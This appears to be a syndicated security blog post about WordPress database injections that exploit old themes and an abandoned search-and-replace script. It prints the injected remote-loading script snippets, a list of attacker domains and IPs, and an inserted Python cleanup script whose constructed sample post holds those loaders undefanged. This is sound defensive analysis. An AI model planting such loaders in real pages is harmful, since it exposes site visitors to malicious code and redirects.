Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'></script>

Or:

<s cript type="text/javascript">var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);</script>

The most noticeable malicious URLs that we’ve seen lately are:

  • con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
  • java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
  • javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
  • js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
  • go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
  • traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
  • blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
  • js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
  • get.simplefunsite[.]info/rw.js (does not resolve at the moment)
  • post.simplefunsite[.]info/go.php?rewrite=81 (does not resolve at the moment)
  • src.dancewithme[.]biz/src.js (185.159.82.2 Russia)
  • go.dancewithme[.]biz/red.php (185.159.82.2 Russia)

They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on August 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite[.]info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!
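The bulk cleanup this paragraph says should not be done by hand, as an added example that is not code from the original post or from Sucuri: it strips every <script> block that references one of the domains listed above from post content (legitimate scripts stay), and it also covers the serialized-data pitfall the title refers to. WordPress stores widget and theme settings as PHP-serialized data in wp_options and wp_postmeta, where each string is written as s:N:"..." with N being its byte length; a plain search-and-replace that shortens the string leaves N wrong and PHP's unserialize() then rejects the whole value. The example therefore walks the serialized blob token by token and recomputes N after cleaning. The domains are the post's own indicators undefanged so they match real database content; the sample post and the sample widget option are constructed, and all function names are this example's own.

```python
import re
from typing import Tuple

# Indicator domains from the post, undefanged for matching against real wp_posts content.
MALICIOUS_DOMAINS = [
    "sometimesfree.biz", "givemealetter.biz", "traffictrade.life",
    "trysomethingnew.eu", "simplefunsite.info", "dancewithme.biz",
]

# A whole <script ...>...</script> block (case-insensitive, may span lines).
SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)
# A listed domain as a whole hostname label sequence, so "con1.sometimesfree.biz" matches.
DOMAIN_RE = re.compile(
    r"(?<![a-z0-9-])(?:" + "|".join(re.escape(d) for d in MALICIOUS_DOMAINS) + r")(?![a-z0-9-])",
    re.IGNORECASE,
)
# Start of a PHP-serialized string token: s:<byte length>:"
SERIALIZED_STR_RE = re.compile(rb's:(\d+):"')


def strip_injected_scripts(html: str) -> Tuple[str, int]:
    """Remove <script> blocks that reference a listed domain; return (cleaned html, removed count)."""
    removed = 0

    def repl(m: "re.Match") -> str:
        nonlocal removed
        block = m.group(0)
        if DOMAIN_RE.search(block):
            removed += 1
            return ""
        return block  # unrelated script (e.g. jQuery) is left alone

    return SCRIPT_RE.sub(repl, html), removed


def serialized_lengths_ok(blob: bytes) -> bool:
    """True if every s:N:"..." token in a PHP-serialized blob has a consistent length prefix."""
    pos = 0
    while True:
        m = SERIALIZED_STR_RE.search(blob, pos)
        if not m:
            return True
        end = m.end() + int(m.group(1))
        if blob[end:end + 2] != b'";':
            return False  # this is exactly what makes PHP's unserialize() return false
        pos = end + 2


def naive_strip(blob: bytes) -> bytes:
    """The pitfall: a plain search-and-replace over serialized data leaves the s:N prefixes wrong."""
    return re.sub(rb"<script\b.*?</script>", b"", blob, flags=re.IGNORECASE | re.DOTALL)


def clean_serialized(blob: bytes) -> Tuple[bytes, int]:
    """Clean every string inside a PHP-serialized blob and recompute its byte length."""
    out = bytearray()
    pos = 0
    removed = 0
    while True:
        m = SERIALIZED_STR_RE.search(blob, pos)
        if not m:
            out += blob[pos:]
            break
        start, end = m.end(), m.end() + int(m.group(1))
        if blob[end:end + 2] != b'";':
            # Not a well-formed string token (false hit or already-broken data): copy through unchanged.
            out += blob[pos:m.end()]
            pos = m.end()
            continue
        # surrogateescape makes the bytes->str->bytes round trip lossless for any encoding.
        text = blob[start:end].decode("utf-8", "surrogateescape")
        cleaned, n = strip_injected_scripts(text)
        cleaned_b = cleaned.encode("utf-8", "surrogateescape")
        removed += n
        out += blob[pos:m.start()] + b's:%d:"' % len(cleaned_b) + cleaned_b + b'";'
        pos = end + 2
    return bytes(out), removed


def php_str(s: str) -> bytes:
    """Serialize one string the way PHP's serialize() does (used to build the constructed sample)."""
    b = s.encode("utf-8")
    return b's:%d:"' % len(b) + b + b'";'


# Constructed sample: two injections of the kind shown in the post, placed before <a href> tags,
# plus one legitimate script that must survive.
SAMPLE_POST = (
    "<p>Welcome to the site.</p>"
    "<script type='text/javascript' src='https://con1.sometimesfree.biz/c.js'></script>"
    '<a href="https://example.com/about">About us</a>'
    '<script type="text/javascript">var t = document.createElement("script");'
    't.type = "text/javascript"; t.src = "https://src.dancewithme.biz/src.js";'
    "document.head.appendChild(t);</script>"
    '<a href="https://example.com/contact">Contact</a>'
    '<script src="/wp-includes/js/jquery.js"></script>'
)
# Constructed sample of a serialized text-widget option holding that post content.
SAMPLE_OPTION = b'a:2:{s:5:"title";' + php_str("Sidebar") + b's:4:"text";' + php_str(SAMPLE_POST) + b"}"

if __name__ == "__main__":
    html, n = strip_injected_scripts(SAMPLE_POST)
    print(f"post content: removed {n} injected script(s)")
    print("naive replace leaves serialized data valid:", serialized_lengths_ok(naive_strip(SAMPLE_OPTION)))
    fixed, n = clean_serialized(SAMPLE_OPTION)
    print(f"serialized option: removed {n}, lengths consistent: {serialized_lengths_ok(fixed)}")
```

Run against real data by iterating over wp_posts.post_content with strip_injected_scripts and over wp_options.option_value / wp_postmeta.meta_value with clean_serialized, after taking a database backup; the naive_strip function is included only to show the failure mode that the length check catches.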

This is a Security Bloggers Network syndicated blog post authored by Denis Sinegubko. Read the original post at: Sucuri Blog